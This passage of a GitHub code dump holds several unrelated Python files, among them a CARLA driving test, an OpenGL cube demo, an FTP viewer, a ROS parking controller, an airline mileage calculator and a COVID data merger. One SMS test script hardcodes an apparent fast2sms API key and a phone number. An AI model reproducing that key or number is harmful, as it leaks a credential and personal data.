latcontroller.run_step(actor.route[2][0].transform, actor.player.get_transform())\n\n                    for a in actor.npc_vehicle_actors:\n                        r = 
random.random()\n if r < 0.001 * exp * exp:\n traffic_manager.force_lane_change(a, True)\n elif r < 0.002 * exp * exp:\n traffic_manager.force_lane_change(a, False)\n\n print(str(iteration) + \"\\t\" + str(step + 1) + \"\\t\" + str(success) + \"\\n\")\n log_file.write(str(iteration) + \"\\t\" + str(step + 1) + \"\\t\" + str(success) + \"\\n\")\nfinally:\n settings = world.get_settings()\n settings.synchronous_mode = False\n settings.no_rendering_mode = False\n world.apply_settings(settings)\n\n actor.destroy()\n\n time.sleep(0.5)\n\n\n","repo_name":"boratw/carla-sff","sub_path":"test_basic/test_sff_policy.py","file_name":"test_sff_policy.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71540249369","text":"import requests\n\nurl = \"https://www.fast2sms.com/dev/bulkV2\"\n\nquerystring = {\n \"authorization\":\"x1T7Cwp6gsQLEZOvY2HoXU34JSPiKWNIeqhBAcfGV90kzldRMtkNM7Fu0R4LYZW9w1BsiEPnpldTSxXa\",\n \"message\":\"This is test message from canceRX\",\n \"language\":\"english\",\n \"route\":\"q\",\n \"numbers\":\"7992381406\"\n }\n\nheaders = {\n 'cache-control': \"no-cache\"\n}\n\nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\nprint(response.json()[\"return\"])\n","repo_name":"Rana1005/cenceRX","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74428274008","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import sleep\nimport sys\nimport array\nfrom OpenGL.GLUT import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nvertices = array.array('f', [-1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, 1,\n -1, -1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1])\n\ncolors = array.array('f', [0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0,\n 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1])\n\ncIndices = array.array('B', [0, 3, 2, 1, 2, 3, 7, 6, 0, 4, 7, 3,\n 1, 2, 6, 5, 4, 5, 6, 7, 0, 1, 5, 4])\n\nanimationAngle = 0.0\nframeRate = 25\n\n\ndef animationStep():\n global animationAngle\n global frameRate\n animationAngle += 2\n while animationAngle > 360:\n animationAngle -= 360\n sleep(1 / float(frameRate))\n glutPostRedisplay()\n\n\ndef display():\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(-2, 2, -2, 2, -2, 2)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glRotatef(animationAngle, 1, 1, 1)\n glEnableClientState(GL_COLOR_ARRAY)\n glEnableClientState(GL_VERTEX_ARRAY)\n glColorPointer(3, GL_FLOAT, 0, colors.tobytes())\n glVertexPointer(3, GL_FLOAT, 0, vertices.tobytes())\n glDrawElements(GL_QUADS, 24, GL_UNSIGNED_BYTE, cIndices.tobytes())\n glDisableClientState(GL_COLOR_ARRAY)\n glDisableClientState(GL_VERTEX_ARRAY)\n glutSwapBuffers()\n\n\ndef init():\n if not (glColorPointer and glVertexPointer and glDrawElements):\n print(''' Error: no vertex array support''')\n sys.exit()\n glClearColor(0, 0, 0, 0)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)\n glutInitWindowSize(250, 250)\n glutInitWindowPosition(100, 100)\n glutCreateWindow(sys.argv[0])\n init()\n glutDisplayFunc(display)\n glutIdleFunc(animationStep)\n glutMainLoop()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"ismaelxyz/graphic-concentration","sub_path":"DemOpenGL/proesch/color_cube/color_cube.py","file_name":"color_cube.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9807337088","text":"import CSVparsing as parser\nimport ftp_connect as FTP\nimport os\nimport shutil\n\n#Code was collaborated and written together by Harry S, Sunil S\nclass runCmdline():\n\n def __init__(self):\n self.outputList=[] #show list for possible files for a specific date\n self.choiceCond=True\n\n def decisionTree(self):\n #main menu for command line application\n while self.choiceCond:\n print(\"---------\\nMain Menu\\n---------\\n\")\n print(\"Option 1: Select Date to view files (1)\")\n print(\"Option 2: Open Specific File (2)\")\n print(\"Option 3: Quit (3)\\n\")\n self.uChoice=str(input(\">: \"))\n #keeps tracks of user input and provides service based on input\n if self.uChoice==\"1\":\n self.dateChoice=str(input(\"Enter Date to view files in (YYYYMMDD) Format\\n>: \"))\n self.dateFileView(self.dateChoice) #function call\n self.uChoice=False #to exit the WHILE loop\n exit(0) #end program execution\n elif self.uChoice==\"2\":\n self.uChoice=str(input(\"Please Enter Specific Filename to View (MED_DATA_YYYYMMDDHHMMSS.csv) >: \"))\n self.specificFile(self.uChoice) #function call\n self.uChoice = False\n exit(0)\n elif self.uChoice==\"3\":\n exit(0)\n else:\n print(\"Enter Valid Data\\n\") #erroneous input\n\n\n def dateFileView(self,date):\n try:\n testCast=int(date) #tests if input is a date\n except:\n print(\"Wrong Data Format\") #otherwise it is rejected\n exit(0)\n try:\n self.itemList = FTP.ftp_fetch() # validation to check if there is a connection to FTP\n except:\n print(\"Couldn't connect to FTP Server, is config up to date? or is server running?\")\n exit(0)\n for items in self.itemList:\n if parser.validateFilename(items):\n if date in str(items):\n os.makedirs(\"tempFTPDownload/\", exist_ok=True)\n FTP.ftp_pull(items, \"tempFTPDownload/\" + str(items))\n if parser.masterValidate(\"tempFTPDownload/\",items): # Validates all files before adding them to Show List\n os.makedirs(\"FTPDownload/\" + str(date[:4]) + \"/\" + str(date[4:6]) + \"/\" + str(date[6:8]), exist_ok=True)\n self.outputList.append(items)\n\n if len(self.outputList) != 0:\n for files in self.outputList:\n os.rename(\"tempFTPDownload/\" + files,\"FTPDownload/\"+files[9:13]+\"/\"+files[13:15]+\"/\"+files[15:17]+\"/\"+files)\n shutil.rmtree(\"tempFTPDownload\")\n\n print(\"The Files for that current day are:\")\n for file in self.outputList:\n print(file)\n\n self.uChoice=str(input(\"Enter File to View >: \"))\n if self.uChoice not in self.itemList: #if filename not found in displayed list\n print(\"Wrong Filename\")\n exit(0)\n else:\n parser.outputNiceCsv(self.uChoice,\"FTPDownload/\"+self.uChoice[9:13]+\"/\"+self.uChoice[13:15]+\"/\"+self.uChoice[15:17]+\"/\") #object method call to print csv in console\n\n def specificFile(self,filename):\n try:\n self.itemList = FTP.ftp_fetch() # validation to check if there is a connection to FTP\n except:\n print(\"Couldn't connect to FTP Server, is config up to date? 
or is server running?\")\n            exit(0)\n        if filename in self.itemList:\n            FTP.ftp_pull(filename, \"tempFTPDownload/\" + str(filename))\n            if parser.masterValidate(\"tempFTPDownload/\", filename): # Validates all files before adding them to Show List\n                parser.outputNiceCsv(self.uChoice, \"tempFTPDownload/\")\n            else:\n                print(\"Invalid Datafile on FTP Server\") #if file cannot be found in file downloaded from FTP server\n                exit(0)\n        else:\n            print(\"Wrong Filename\")\n            exit(0)\n\nif __name__==\"__main__\":\n    cmdRunObj=runCmdline()\n    cmdRunObj.decisionTree()\n","repo_name":"SSName1/FTP-Project","sub_path":"launchCmdline.py","file_name":"launchCmdline.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20982829193","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport logging\nimport os\n\nimport uiautomator2 as u2\nfrom git import Repo\n\nfrom common import project_dir\nfrom common.config_parser import ReadConfig\n\nplatform = ReadConfig().get_platform\n\n\ndef get_android_version() -> int:\n    android_version = os.popen(\"adb shell getprop ro.build.version.release\").read().split(\".\")[0]\n    logging.info(\"current android version is: {}\".format(android_version))\n    return int(android_version)\n\n\ndef get_installed_package_name() -> str:\n    package_name = None\n    for package in ReadConfig().get_package_name:\n        package_info = os.popen(\"adb shell \\\"pm list packages |grep \" + package + \"\\\"\").read()\n        if package_info:  # popen().read() returns '' (not None) when grep matches nothing\n            package_name = package\n            break\n    if package_name is None:\n        raise RuntimeError(\"none of the configured packages is installed\")\n    return package_name\n\n\ndef install_app(file_path):\n    logging.info(\"install app path: {}\".format(file_path))\n    try:\n        if platform == \"android\":\n            os.popen(\"adb install -d -r \" + file_path)\n            d = u2.connect()\n            d.unlock()\n            if get_android_version() >= 10:\n                logging.info(\"install app finished\")\n                return\n            element = d(text=\"重新安装\")  # the \"Reinstall\" button\n            if element.wait(timeout=10.0):\n                element.click()\n                d.click(0.75, 0.95)  # tap Install (proportional coordinates)\n            element = d(textContains=\"安装完成\")  # \"installation finished\" text\n            if element.wait(timeout=20.0):\n                d.click(0.25, 0.95)  # tap Done (proportional coordinates)\n        elif platform == \"ios\":\n            pass\n        logging.info(\"install app finished\")\n    except Exception as e:\n        logging.error(\"install app failed: {}\".format(e))\n        raise\n\n\ndef git_pull():\n    repo = Repo(project_dir)\n    repo.remote().pull()\n","repo_name":"ranyong1997/Auto_Uiautomator2","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
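get_installed_package_name above probes the device with `pm list packages` through os.popen, whose .read() yields an empty string rather than None when grep matches nothing. A sketch of the same probe via subprocess, assuming adb is on PATH and a device is attached:

import subprocess

def is_installed(package: str) -> bool:
    # 'pm list packages <filter>' prints matching package lines, or nothing at all
    out = subprocess.run(['adb', 'shell', 'pm', 'list', 'packages', package],
                         capture_output=True, text=True).stdout
    return package in out

print(is_installed('com.android.settings'))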
 +{"seq_id":"34738332493","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n\n# https://dxmahata.gitbooks.io/leetcode-python-solutions/content/unique_binary_search_trees_ii.html\nclass Solution:\n    def generateTrees(self, n: int) -> List[Optional[TreeNode]]:\n        # make unique BSTs from the nodes having value of 1, 2, ..., n\n        if n == 0:\n            return []\n        else:\n            return self.tree_constructor(1, n)\n    \n    def tree_constructor(self, m:int, n:int):\n        # m: start\n        # n: end\n        results = []\n        if m > n:\n            results.append(None)\n            return results # start > end: no possible BST\n        else:\n            for i in range(m, n+1):\n                l = self.tree_constructor(m, i-1) # find all possible left subtrees\n                r = self.tree_constructor(i+1, n) # find all possible right subtrees\n                for left_tree in l:\n                    for right_tree in r:\n                        # for every combination of available left and right subtrees:\n                        curr_node = TreeNode(i)\n                        curr_node.left = left_tree\n                        curr_node.right = right_tree\n                        results.append(curr_node)\n            return results\n    ","repo_name":"jwyang21/leetcode","sub_path":"0095-unique-binary-search-trees-ii/0095-unique-binary-search-trees-ii.py","file_name":"0095-unique-binary-search-trees-ii.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20568101135","text":"#!/usr/bin/env python\nimport rospy\nfrom visual_servoing_tesse.msg import cone_location, parking_error\nfrom geometry_msgs.msg import PointStamped\nfrom ackermann_msgs.msg import AckermannDriveStamped\nimport numpy as np\n\nimport ros_utils\n\nclass ParkingController():\n    DRIVE_TOPIC = \"/tesse/drive\"\n    CONE_LOCATION = \"/relative_cone\"\n    PARKING_ERROR_TOPIC = \"/parking_error\"\n\n    L = rospy.get_param(\"pursuit/l\")\n    V = rospy.get_param(\"pursuit/v\")\n    D_LIM = rospy.get_param(\"pursuit/park/d_lim\")\n    DELTA_LIM = rospy.get_param(\"pursuit/park/delta_lim\")\n\n    X_BUMPER = 1.5\n\n    def __init__(self):\n        self.cone_sub = rospy.Subscriber(self.CONE_LOCATION, cone_location, self.relative_cone_callback)\n        self.drive_pub = rospy.Publisher(self.DRIVE_TOPIC, AckermannDriveStamped, queue_size = 5)\n        self.error_pub = rospy.Publisher(self.PARKING_ERROR_TOPIC, parking_error, queue_size = 5)\n\n        def v_park(d, delta):\n            \"\"\"\n            A velocity curve which increases linearly with parking distance, and\n            decreases on a bell curve (sech) with steering angle.\n            \"\"\"\n            d_0 = 0.6096 # Desired Parking distance (less than 2 ft from front bumper)\n            v_dist = min(1/self.D_LIM * (d-self.X_BUMPER), 1.0) if d > d_0 else 0.0\n            v_steer = 1.0 / np.cosh( 2*delta / self.DELTA_LIM )  # sech(x) = 1/cosh(x)\n            return v_dist * v_steer\n\n        # the velocity curve has to exist before it is handed to the controller\n        self.controller = PurePursuit(self.L, self.V, v_park)\n\n    def init_header(self, header, frame = \"base_link_gt\"):\n        header.stamp = rospy.Time.now()\n        header.frame_id = frame\n\n    def relative_cone_callback(self, cone_msg):\n        # Update pure pursuit controller\n        x, y = cone_msg.x_pos, cone_msg.y_pos\n        self.controller.update_control(x, y)\n\n        # Publish Ackermann drive instructions\n        drive = AckermannDriveStamped()\n        self.init_header(drive.header)\n\n        drive.drive.steering_angle, drive.drive.speed =\\\n            self.controller.get_control(log = False)  # AckermannDrive's velocity field is named 'speed'\n\n        self.drive_pub.publish(drive)\n\n        # Publish parking error\n        error = parking_error()\n        error.x = self.controller.x\n        error.y = self.controller.y\n        error.distance_error = self.controller.d\n        self.error_pub.publish(error)\n\n\nif __name__ == '__main__':\n    try:\n        rospy.init_node('ParkingController', anonymous=True)\n        ParkingController()\n        rospy.spin()\n    except rospy.ROSInterruptException:\n        pass\n","repo_name":"mperaza0714/6.141","sub_path":"visual_servoing_tesse-master/visual_servoing_tesse-master/src/parking_controller.py","file_name":"parking_controller.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33281923453","text":"from urllib.request import urlopen as uReq\r\nfrom bs4 import BeautifulSoup as Soup\r\nfrom functools import reduce\r\nimport operator\r\nimport re\r\nimport requests\r\nimport 
sys\r\n\r\n\r\nPATTERN = re.compile('^[A-Za-z]{3}$')\r\nFLIGHT_PRICE = re.compile('^[0-9]+')\r\nAIRLINE = re.compile('^(delta|united|american)$', re.IGNORECASE)\r\nFARE_CLASS = re.compile('^[A-Za-z]{1}$')\r\nURL = \"http://www.webflyer.com/travel/mileage_calculator/getmileage.php?{url_params}\"\r\nFARE_CLASS_MULTIPLIER_DICTIONARY = {\r\n'Delta':\r\n {\r\n 'N': 0,\r\n\r\n 'E': 1,\r\n 'H': 1,\r\n 'K': 1,\r\n 'L': 1,\r\n 'M': 1,\r\n 'Q': 1,\r\n 'S': 1,\r\n 'T': 1,\r\n 'U': 1,\r\n 'V': 1,\r\n 'W': 1,\r\n 'X': 1,\r\n\r\n 'A': 1.5,\r\n 'B': 1.5,\r\n 'C': 1.5,\r\n 'D': 1.5,\r\n 'G': 1.5,\r\n 'I': 1.5,\r\n 'P': 1.5,\r\n 'Y': 1.5,\r\n 'Z': 1.5,\r\n\r\n 'F': 2,\r\n 'J': 2,\r\n },\r\n'United':\r\n {\r\n 'N': 0,\r\n\r\n 'M': 1,\r\n 'E': 1,\r\n 'U': 1,\r\n 'H': 1,\r\n 'Q': 1,\r\n 'V': 1,\r\n 'W': 1,\r\n 'S': 1,\r\n 'T': 1,\r\n 'L': 1,\r\n 'K': 1,\r\n 'G': 1,\r\n\r\n 'Y': 1.5,\r\n 'B': 1.5,\r\n\r\n 'A': 2,\r\n 'C': 2,\r\n 'D': 2,\r\n 'Z': 2,\r\n 'P': 2,\r\n 'F': 3,\r\n 'J': 3,\r\n },\r\n'American':\r\n {\r\n 'B': 0,\r\n\r\n 'H': 1,\r\n 'K': 1,\r\n 'M': 1,\r\n 'L': 1,\r\n 'V': 1,\r\n 'G': 1,\r\n 'S': 1,\r\n 'N': 1,\r\n 'Q': 1,\r\n 'O': 1,\r\n\r\n 'Y': 1.5,\r\n 'W': 1.5,\r\n 'P': 1.5,\r\n\r\n 'A': 2,\r\n 'D': 2,\r\n 'I': 2,\r\n 'R': 2,\r\n\r\n 'F': 3,\r\n 'J': 3,\r\n }\r\n}\r\n\r\n\r\ndef is_valid_airport_code(codes):\r\n return bool(PATTERN.search(codes))\r\n\r\n\r\ndef validate_code(codes):\r\n return is_valid_airport_code(codes) and len(codes) == 3\r\n\r\n\r\ndef is_valid_flight_cost(valid_flight_cost):\r\n return bool(FLIGHT_PRICE.search(valid_flight_cost))\r\n\r\n\r\ndef validate_flight_cost(valid_flight_cost):\r\n return is_valid_flight_cost(valid_flight_cost) and len(valid_flight_cost) >= 2\r\n\r\n\r\ndef is_valid_airline(valid_airline_name):\r\n return bool(AIRLINE.search(valid_airline_name))\r\n\r\n\r\ndef validate_airline(valid_airline_name):\r\n return is_valid_airline(valid_airline_name) and len(valid_airline_name) >= 5\r\n\r\n\r\ndef is_valid_fare_class(fare_class):\r\n return bool(FARE_CLASS.search(fare_class))\r\n\r\n\r\ndef validate_fare_class(fare_class):\r\n return is_valid_fare_class(fare_class) and len(fare_class) == 1\r\n\r\n\r\n# Prompts the user for their airports codes as a comma separated string, must be a least two, no more than five.\r\ndef get_codes(airport_user_input):\r\n codes = [c.strip() for c in airport_user_input.split(',')]\r\n if len(codes) > 5:\r\n print(\"You entered {}, max is 5 airport codes\".format(len(codes)))\r\n sys.exit(1)\r\n elif len(codes) < 2:\r\n print('You must enter at least 2 codes separated by commas: i.e. lax, sjc')\r\n sys.exit(1)\r\n elif not all([validate_code(x) for x in codes]):\r\n print(\"All codes must be alphanumeric and 3 digits. 
You passed in {}\".format(codes))\r\n sys.exit(1)\r\n print(\"-- Found properly formatted airport codes: {}\".format(codes))\r\n return codes\r\n\r\n\r\n# Passes the collected airport codes as a URL query, if 200 code not returned an exception is raised.\r\ndef get_city_data(codes):\r\n params = '&'.join(['city={}'.format(c) for c in codes])\r\n url = URL.format(url_params=params)\r\n page_html = requests.get(url)\r\n if page_html.status_code == 200:\r\n return page_html.content\r\n raise Exception('We are unable to query the mileage data at the moment, sorry.')\r\n\r\n\r\n# Returns the total flight miles as an integer from the HTML parse.\r\ndef get_miles_from_html(page_html):\r\n page_extract = Soup(page_html, \"html.parser\")\r\n try:\r\n table_data = page_extract.find(\"table\", attrs={\"class\": \"table_bg\"})\r\n # On the website the round-trip mileage is stored in a table, it is extracted at the -2 table index.\r\n flight_mileage = re.search('[0-9]+', table_data.findAll(\"td\")[-2].text)\r\n except AttributeError:\r\n raise sys.exit(\"Error, your airport codes could not be validated\")\r\n else:\r\n return int(flight_mileage.group())\r\n\r\n\r\n# Checks for a properly formatted flight cost.\r\ndef get_flight_cost(flight_cost_input):\r\n valid_flight_cost = flight_cost_input.strip('$')\r\n if len(valid_flight_cost) <= 1:\r\n print(\"Please input a flight price greater than $10\")\r\n sys.exit(1)\r\n elif len(valid_flight_cost) >= 4:\r\n print(\"Please input a flight price less than $1,000\")\r\n sys.exit(1)\r\n elif not validate_flight_cost(valid_flight_cost):\r\n print(\"Please use only whole numbers with no symbols or commas\")\r\n sys.exit(1)\r\n print(\"-- Flight cost stored: ${}\".format(valid_flight_cost))\r\n return valid_flight_cost\r\n\r\n\r\n# Returns the airline name if the input matches values; Delta, United, or American.\r\ndef get_airline(airline_input):\r\n valid_airline_name = airline_input.capitalize()\r\n if not validate_airline(valid_airline_name):\r\n print(\"Please input either; Delta, United, or American\")\r\n sys.exit(1)\r\n print(\"-- Airline name stored: {}\".format(valid_airline_name))\r\n return valid_airline_name\r\n\r\n\r\n# Returns fare class character [key] to later lookup the corresponding value [multiplier].\r\ndef get_fare_class(fare_class_input):\r\n fare_class = fare_class_input.upper()\r\n if len(fare_class) != 1:\r\n print(\"You may only enter a single letter for your fare class; i.e. 
K\")\r\n sys.exit(1)\r\n elif not validate_fare_class(fare_class):\r\n print(\"You may only enter one character A-Z\")\r\n sys.exit(1)\r\n print(\"-- Fare code stored: {}\".format(fare_class))\r\n return fare_class\r\n\r\n\r\n# Returns the fare class multiplier as a float from the nested 'multiplier' dictionary.\r\ndef get_from_airline_dict(valid_airline_name, fare_class):\r\n try:\r\n multiplier = FARE_CLASS_MULTIPLIER_DICTIONARY[valid_airline_name][fare_class]\r\n return multiplier\r\n except KeyError:\r\n print(\"Sorry, that fare class is not a choice for {} Airlines.\".format(valid_airline_name))\r\n sys.exit(1)\r\n\r\n\r\n# Performs calculation to determine the EQM's and CPM by passing in fare cost, multiplier, and distance.\r\ndef get_cpm_calculation(multiplier, valid_flight_cost, flight_mileage):\r\n # The flight cost is divided by the flight mileage, then multiplied by the fare class multiplier to return the CPM.\r\n cpm = ((int(valid_flight_cost) / int(flight_mileage)) * int(multiplier)) * 100\r\n # The EQM, or elite qualifying miles,\r\n elite_miles_earned = int(flight_mileage) * int(multiplier)\r\n if cpm == 0:\r\n print(\"Sorry, your EQM and CPM could not be calculated\")\r\n sys.exit(1)\r\n elif valid_airline_name == 'Delta':\r\n print(\"This \" + str(\"{0:,g}\".format(flight_mileage)) + \" mile round-trip flight \"\r\n \"on Delta Airlines in fare class: \" + str(fare_class) + \" = '\" + str(multiplier) + \"x',\"\r\n \" which calculates at \" + str(format(cpm, '.2f')) + \" 'Cents Per Mile',\"\r\n \" earns you \" + (\"{0:,g}\".format(elite_miles_earned)) + \" MQMs.\")\r\n elif valid_airline_name == 'United':\r\n print(\"This \" + str(\"{0:,g}\".format(flight_mileage)) + \" mile round-trip flight \"\r\n \"on United Airlines in fare class: \" + str(fare_class) + \" = '\" + str(multiplier) + \"x',\"\r\n \" which calculates at \" + str(format(cpm, '.2f')) + \" 'Cents Per Mile',\"\r\n \" earns you \" + (\"{0:,g}\".format(elite_miles_earned)) + \" PQMs.\")\r\n elif valid_airline_name == 'American':\r\n print(\"This \" + str(\"{0:,g}\".format(flight_mileage)) + \" mile round-trip flight \"\r\n \"on American Airlines in fare class: \" + str(fare_class) + \" = '\" + str(multiplier) + \"x',\"\r\n \" which calculates at \" + str(format(cpm, '.2f')) + \" 'Cents Per Mile',\"\r\n \" earns you \" + (\"{0:,g}\".format(elite_miles_earned)) + \" EQMs.\")\r\n sys.exit(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n airport_user_input = input(\"Input up to 5 airport codes ( i.e. lax, jfk, lhr ) \")\r\n codes = get_codes(airport_user_input)\r\n page_html = get_city_data(codes)\r\n flight_mileage = get_miles_from_html(page_html)\r\n flight_cost_input = input(\"What's the round-trip cost as a whole number with no symbols (i.e. 425)? \")\r\n valid_flight_cost = get_flight_cost(flight_cost_input)\r\n airline_input = input(\"Are you flying Delta, United, or American? \")\r\n valid_airline_name = get_airline(airline_input)\r\n fare_class_input = input(\"What is your fare class code? 
i.e: N \")\r\n fare_class = get_fare_class(fare_class_input)\r\n flight_mileage = get_miles_from_html(page_html)\r\n multiplier = get_from_airline_dict(valid_airline_name, fare_class)\r\n get_cpm_calculation(multiplier, valid_flight_cost, flight_mileage)\r\n\r\n","repo_name":"ManOfMiles/eqmCalc","sub_path":"cpmcalculator.py","file_name":"cpmcalculator.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34982377359","text":"\"\"\"Takes covid county data and census data and output csv file.\n\nExamples:\n\n\"\"\"\nimport logging\n\nimport click\nimport pandas as pd\nimport requests\n\n\ndef dl_file(input_url: str, output_file: str):\n \"\"\"Download file and save to output\n Args:\n input_url: file url\n output_file: save file to path\n \"\"\"\n try:\n resp = requests.get(input_url, allow_redirects=True)\n with open(output_file, 'wb') as fd:\n fd.write(resp.content)\n except Exception as exc:\n logging.exception(\"unable to download %s, %s\", input_url, exc)\n return None\n return output_file\n\n\ndef combine_covid_data(county_data: str, census_data: str):\n \"\"\"Create final table with this schema:\n population: population,\n case: daily cases,\n deaths: daily deaths,\n cumulative_cases: cumulative cases to date, and\n cumulative_deaths: cumulative death\n\n Args:\n county_data:\n census_data:\n\n Effects: Writes to CSV\n Return: None\n \"\"\"\n # load dataframe\n #\n df1 = None\n df2 = None\n\n try:\n df1 = pd.read_csv(county_data, dtype={\"fips\": str})\n df2 = pd.read_csv(census_data,\n encoding=\"latin-1\", dtype={\"STATE\": str, \"COUNTY\": str})\n except Exception as exc:\n logging.warning(\"unable to load df: %s\", str(exc))\n return pd.DataFrame()\n logging.info(\"processing population data: %s, %s\", len(df2), len(df2.columns))\n # FIPS 6-4 used the 2 digits FIPS state code followed by 3 digits county\n df2[\"fips\"] = df2[\"STATE\"] + df2[\"COUNTY\"]\n # use POPESTIMATE2019 as population\n pop_df = df2[[\"fips\", \"POPESTIMATE2019\"]]\n pop_df = pop_df.rename(columns={\"POPESTIMATE2019\": \"population\"})\n\n logging.info(\"processing county data %s, %s\", len(df1), len(df1[\"fips\"].unique()))\n # groupby and aggregate cases, deaths\n # cols = [\"fips\", \"date\", \"county\", \"state\"]\n cols = [\"fips\", \"date\"]\n\n # reorder and drop state and country\n df1 = df1[[\"fips\", \"date\", \"cases\", \"deaths\"]]\n # drop non-county data\n notna_df = df1[df1[\"fips\"].notna()]\n\n # set multicol index, pivot date values to columns, and then unpivot date labels\n dates_df = notna_df.set_index(cols).unstack(\"date\", fill_value=0).stack(\"date\")\n dates_df = dates_df.reset_index()\n\n logging.info(\"creating diff columns\")\n # get diff in separate df\n diff_df = dates_df.groupby([\"fips\"]).agg(\n {\"cases\": \"diff\", \"deaths\": \"diff\"}).fillna(0)\n dates_df[\"daily_cases\"] = diff_df[\"cases\"]\n dates_df[\"daily_deaths\"] = diff_df[\"deaths\"]\n\n dates_df = dates_df.rename(columns={\"cases\": \"cumulative_cases\"})\n dates_df = dates_df.rename(columns={\"deaths\": \"cumulative_deaths\"})\n\n # do join on census data and population data on column fips\n # res_df = pd.merge(group_fin_df, pop_df, on=\"fips\", how=\"left\")\n res_df = pd.merge(pop_df, dates_df, on=\"fips\", how=\"right\")\n res_df = res_df[[\"fips\", \"date\", \"daily_cases\", \"daily_deaths\", \"cumulative_cases\", \"cumulative_deaths\"]]\n logging.info(\"sample data: count: %s \\n%s\", len(res_df), 
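# The mileage calculator above validates every input with a compiled regex plus
# a length check before touching the network; a minimal sketch of that
# validate-early pattern (names below are illustrative, not from the script):
import re

IATA_CODE = re.compile(r'^[A-Za-z]{3}$')

def is_valid_iata(code: str) -> bool:
    # anchoring with ^ and $ folds the length constraint into the pattern itself
    return bool(IATA_CODE.match(code.strip()))

assert is_valid_iata(' LAX '.strip()) and not is_valid_iata('LAXX')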
res_df.head(10))\n\n return res_df\n\n\n@click.command()\n@click.option(\"--covid_data\", default=\"data/us-counties.csv\", help=\"Path to covid data\")\n@click.option(\"--census_data\", default=\"data/co-est2019-alldata.csv\", help=\"Path to census data\")\n@click.option(\"--output\", default=\"covid_population.csv\", help=\"Path to output file\")\n@click.option(\"--csv_out\", default=True, help=\"Write to CSV or print sample\")\n@click.option(\"--download\", \"-d\", is_flag=True, help=\"Download from url\")\n@click.option(\"--verbose\", is_flag=True, help=\"More logging messages\")\n# pylint: disable=R0913\ndef main(covid_data=\"\", census_data=\"\", output=\"\", csv_out=True, download=False, verbose=False):\n \"\"\"Takes covid county data and census data, process, and output csv file.\n Examples:\n\n $ python covid_data.py --covid_data data/us-counties.csv \\\\\n --census_data data/co-est2019-alldata.csv --output res.csv\n \"\"\"\n # Above is used by click help\n \"\"\"Main function that uses click for option handling\n Args:\n covid_data: covid input file or url\n census_data: census input file or url\n output: output csv\n csv_out: csv output or print sample\n download: download the files\n verbose: verbose usage\n Effects: Write out file or print\n Return: None\n \"\"\"\n if verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n else:\n logging.getLogger().setLevel(logging.INFO)\n df = pd.DataFrame()\n if download:\n dl_covid = dl_file(covid_data, \"dl-us-counties.csv\")\n dl_census = dl_file(census_data, \"dl-census-est2019.csv\")\n if dl_covid and dl_census:\n df = combine_covid_data(dl_covid, dl_census)\n else:\n logging.error(\"ERROR: download url: %s, %s\",\n covid_data, census_data)\n else:\n logging.info(\"processing data\")\n df = combine_covid_data(covid_data, census_data)\n if csv_out:\n logging.info(\"writing output file %s\", output)\n df.to_csv(output, index=False)\n else:\n logging.warning(\"non csv output not supported\")\n print(\"sample data table\\n%s\", str(df.head(100)))\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"statsoah/covid_county_data","sub_path":"covid_data.py","file_name":"covid_data.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10594899149","text":"from __future__ import absolute_import\n\nimport fixtures\nimport mock\n\nfrom nova import exception\nfrom nova import objects\nfrom nova.objects import migrate_data as mig_obj\nfrom nova import test\nfrom nova.tests.unit import fake_network\n\nfrom nova_powervm.tests.virt import powervm\nfrom nova_powervm.tests.virt.powervm import fixtures as fx\nfrom nova_powervm.virt.powervm import live_migration as lpm\n\n\nclass TestLPM(test.NoDBTestCase):\n def setUp(self):\n super(TestLPM, self).setUp()\n\n self.flags(disk_driver='localdisk', group='powervm')\n self.drv_fix = self.useFixture(fx.PowerVMComputeDriver())\n self.drv = self.drv_fix.drv\n self.apt = self.drv.adapter\n\n self.inst = objects.Instance(**powervm.TEST_INSTANCE)\n\n self.network_infos = fake_network.fake_get_instance_nw_info(self, 1)\n self.inst.info_cache = objects.InstanceInfoCache(\n 